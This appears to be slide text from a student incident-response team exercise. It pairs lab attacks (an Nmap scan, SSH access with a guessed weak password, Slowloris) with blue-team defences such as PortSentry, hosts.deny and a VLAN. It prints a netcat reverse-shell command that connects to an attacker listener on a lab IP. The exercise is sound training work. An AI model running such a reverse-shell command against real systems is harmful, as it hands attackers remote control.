RightPoint

Incident Response
Team Exercise (IRTx)
Project Summary and Evaluation

Luke Fincher
Mohamed Jaber
Sam Prevett
Jake Seung Nam
Phillip Wood
1 - port scan nmap

2 - reverse shell netcat

3 - ddos slowloris
Initial Nmap scan is successful 1
Initiating PortSentry:
Checking status via logs:
/etc/init.d/portsentry start
journalctl -u portsentry 1
After PortSentry activated: unable to perform Nmap scan 1
Monitoring logs: journalctl -u portsentry 1
PortSentry automatically appends the attacker to /etc/hosts.deny 1
PortSentry log data written to a text file as evidence 1
PortSentry history file automatically appended with timestamped entry of
first attempted scan from the attacking machine 1
PortSentry service stopped so it would not impact the next attacks
SSH service status confirmed active: systemctl status ssh 2
User with weak password added to host
Simulates a plausible vulnerability to brute-force unauthorised access 2
Open a listener on port 4444 with netcat, to initiate reverse shell 2
SSH with the guessed credentials into 192.168.1.5
Start the reverse shell: nc 192.168.1.9 4444 -e /bin/bash 2
Using reverse shell from the listening attacker 192.168.1.9 2
Monitoring of SSH logs: journalctl -u ssh
SSH session opened for vulnerable_fool from a suspicious IP address 2
Investigate running processes by PID and by user
Containment: kill all processes associated with vulnerable_fool 2
Connection ended due to Blue Team killing the SSH and shell processes 2
Manually configure access to the attacked host
Only allow SSH from Blue Team IP addresses 2
Set all SSH connections to be denied by default in /etc/hosts.deny
Any host not explicitly included in /etc/hosts.allow is now denied 2
Failed attempt to reconnect via SSH after the Blue Team protections 2
Server: python3 -m http.server --bind 192.168.1.5 8080
Attack it with Slow Loris 3
The running webserver outputs error messages to its shell
Wireshark is used to capture TCP packets for evidence and analysis 3
The best defence is to logically partition the network with VLANs
Configure the Cisco switch (by console line) with a new VLAN 60 3
VLAN 60 is assigned to the port interface connected to the webserver
Restrict port to access mode to deny communication from outside VLAN 60 3
Can no longer communicate with Blue Team machines at all 3
Luke Fincher
Introduction
Objectives & Target Validation
Individual Team Member Achievements
Lessons Learned
Phillip Wood
Project Appraisal
Lessons Learned
Mohammed Jaber
Incident/Event Identification Strategy
Lessons Learned
Jake Seung Nam
The Efficacy of Communication
Lessons Learned
Sam Prevett
Recommendations for Enhancement
Lessons Learned
Conclusion
Q&A
Appendix
Contributions
Luke Fincher
Minutes + Agenda x1, AT3 Red Team document, Red team Playbook, Evaluation + negotiation plan +
CSO email Document, Performance evaluation form, Communication report, Exercise closure
report, the speech.

Phillip Wood
Minutes + Agenda x1, AT3 Blue Team document, Blue Team playbook, Evaluation + negotiation plan
+ CSO email Document, IRP Evaluation document (AT2 Part 2), Briefing report (AT1), the speech,
Project Management report.

Mohammed Jaber
Minutes + Agenda x1, AT3 Red Team document, Observer Checklist, Evaluation + negotiation plan +
CSO email Document, Statement of work, the slideshow, the speech.

Jake Seung Nam

Minutes + Agenda x1, AT3 Blue Team document, Rule of Engagement, Evaluation + negotiation plan
+ CSO email Document, the speech.

Sam Prevett
Minutes + Agenda x1, AT3 Blue Team document, Stakeholder status report, Evaluation + negotiation
plan + CSO email Document, Gantt chart, the speech.